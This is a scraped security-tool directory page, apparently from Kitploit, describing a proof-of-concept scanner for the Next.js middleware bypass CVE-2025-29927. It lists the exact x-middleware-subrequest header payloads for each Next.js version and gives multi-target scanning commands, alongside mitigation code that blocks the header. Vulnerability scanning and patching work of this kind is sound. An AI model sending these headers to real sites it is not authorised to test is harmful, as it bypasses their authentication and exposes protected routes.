Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
poc-nextjs-CVE-2025-29927 | Kitploit
도구/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

저장소 보기
1년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Next.js 미들웨어 Subrequest 취약점 스캐너

Next.js 미들웨어 취약점(CVE-2025-29927)을 탐지하기 위한 견고한 개념 증명(PoC) 도구입니다.

개요

이 도구는 x-middleware-subrequest 헤더를 사용하여 미들웨어에 구현된 보안 검사를 우회할 수 있는 Next.js 애플리케이션의 심각한 취약점을 테스트합니다. 이 익스플로잇은 Next.js 버전에 따라 달라지는 특정 악성 헤더가 포함된 HTTP 요청을 전송하는 방식으로 이루어집니다.

익스플로잇 작동 방식

연구에 따르면 Next.js 버전에 따라 서로 다른 페이로드가 사용됩니다:

  1. 12.2 이전 버전:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. 12.2 이상 버전:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    또는

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

    (앱이 src 디렉토리를 사용하는 경우)

  3. 최신 버전(예: 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    또는

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    

이 PoC는 이러한 모든 페이로드를 자동으로 테스트하고 어떤 것이 성공했는지 보고합니다.

기능

  • 단일 또는 다중 대상 테스트
  • 멀티스레딩을 통한 동시 스캔
  • 사용자 지정 요청 경로
  • 가능한 모든 페이로드 자동 테스트
  • 터미널에서의 상세하고 색상 있는 출력
  • JSON 결과 내보내기
  • 견고한 오류 처리
  • 포괄적인 취약점 탐지

요구 사항

  • Python 3.7+
  • 필요한 패키지:
    • requests
    • colorama

설치

root@kitploit:~
# Clone o repositório ou baixe os arquivos
# Navegue até o diretório
cd poc-nextjs-2025

# Instale os pacotes necessários
pip install -r requirements.txt

사용법

root@kitploit:~
python main.py -u https://exemplo.com   # Testar uma única URL
python main.py -f alvos.txt             # Testar múltiplas URLs de um arquivo

명령줄 인수

예시

root@kitploit:~
# Escaneamento básico de um único alvo
python main.py -u https://exemplo.com

# Escanear múltiplos alvos com caminhos personalizados
python main.py -f alvos.txt -p /api/users,/admin,/dashboard

# Escanear com maior concorrência e timeout mais longo
python main.py -u https://exemplo.com -t 10 --timeout 15

# Salvar resultados em um arquivo JSON
python main.py -u https://exemplo.com -o resultados_scan.json

탐지 방법론

스캐너는 다음을 통해 작동합니다:

  1. 대상에 일반 요청 보내기
  2. Next.js 버전에 따라 x-middleware-subrequest 헤더의 다양한 변형으로 요청 보내기
  3. 취약점 지표를 식별하기 위한 응답 비교:
    • 일반 요청이 차단(4xx/5xx)되었지만 익스플로잇 요청은 허용(2xx)됨
    • 응답 콘텐츠의 상당한 차이
    • 인증/권한 부여 우회 지표

완화 조치

취약한 애플리케이션을 발견한 경우 다음 완화 조치를 적용하십시오:

  • Next.js 14.2.25 또는 15.2.3 이상 버전으로 업데이트하십시오
  • x-middleware-subrequest 헤더가 포함된 요청을 차단하는 미들웨어를 구현하십시오
root@kitploit:~
export function middleware(request: NextRequest) {
  if (request.headers.has('x-middleware-subrequest')) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}
도구 다운로드
옵션설명
-u, --url URL스캔할 대상 URL
-f, --file ARQUIVO스캔할 여러 URL이 포함된 파일 (한 줄에 하나)
-p, --paths CAMINHOS테스트할 경로 목록 (쉼표로 구분, 기본값: 일반적인 경로)
-t, --threads N동시 스레드 수 (기본값: 5)
-o, --output ARQUIVO결과를 JSON 파일로 저장
--timeout N요청 제한 시간(초) (기본값: 10)